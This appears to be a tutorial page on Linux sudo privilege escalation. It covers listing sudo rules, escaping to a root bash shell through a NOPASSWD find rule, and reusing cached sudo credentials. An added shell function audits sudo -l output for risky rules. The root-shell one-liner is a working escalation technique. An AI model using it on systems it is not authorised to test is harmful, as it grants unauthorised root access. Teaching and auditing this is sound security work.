
Sudo Access

Misconfigured sudo permissions often lead to privilege escalation opportunities.

List Sudoers File

Check whether the current user has sudo access and which commands are allowed:

sudo -l

Example output:

User user1 may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/ls

Abusable Sudo Permissions

If a user is allowed to run commands such as find or ls with NOPASSWD, the rule can be exploited: the command runs as root without a password prompt, so anything it is able to launch also runs as root.

An example of escalating through find:

sudo /usr/bin/find / -exec /bin/bash \;

(This runs a bash shell with root privileges.)
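
As an added example (not from the original page), the shell function below reviews sudo -l output from the defender's side, reporting every command that can be run without a password and rating it. The function name, the EXEC_CAPABLE list and the third sample line are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: review `sudo -l` output for NOPASSWD rules.
# EXEC_CAPABLE is an assumption: a reviewer-maintained, space-separated list of
# binaries able to launch other programs. It holds only find, the case above.
EXEC_CAPABLE="${EXEC_CAPABLE:-find}"

# Reads `sudo -l` output on stdin; prints "SEVERITY runas command" for every
# command that can be run without a password.
audit_sudo_rules() {
    awk -v risky="$EXEC_CAPABLE" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*\(/ {
        line = $0; sub(/^[ \t]*/, "", line)
        close_idx = index(line, ")")
        runas = substr(line, 1, close_idx)
        m = split(substr(line, close_idx + 1), c, ",")
        nopw = 0                      # tags carry over to later commands
        for (j = 1; j <= m; j++) {
            item = c[j]; sub(/^[ \t]+/, "", item)
            while (match(item, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(item, 1, RLENGTH); sub(/:.*/, "", tag)
                if (tag == "NOPASSWD") nopw = 1
                if (tag == "PASSWD") nopw = 0
                item = substr(item, RLENGTH + 1)
            }
            if (!nopw || item == "") continue
            split(item, w, " "); nb = split(w[1], p, "/")
            sev = "REVIEW"
            if (p[nb] in bad) sev = "HIGH"          # listed as able to run programs
            if (w[1] == "ALL") sev = "CRITICAL"     # unrestricted root
            print sev, runas, item
        }
    }'
}

# Constructed sample: the two rules from the example output plus one made-up
# line showing a tag that appears mid-list.
SAMPLE='User user1 may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/ls
    (root) /usr/bin/systemctl restart app, NOPASSWD: ALL'

printf '%s\n' "$SAMPLE" | audit_sudo_rules
```

On a live host, pipe the real listing into it: sudo -l | audit_sudo_rules. Commands that still require a password are deliberately left out of the report.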

Sudo Caching

Sudo caches the user's credentials for 5 minutes (by default). During this period, the user is not required to enter the password again.

If the sudo credentials are cached, it may be possible to run commands as root without re-entering the password.

Verify cached credentials using the -v flag. If this command prompts for a password, the credentials are no longer cached. If they are cached, running this command restarts the cache timer:

sudo -v

If the credentials are cached, use the -i flag to become root:

sudo -i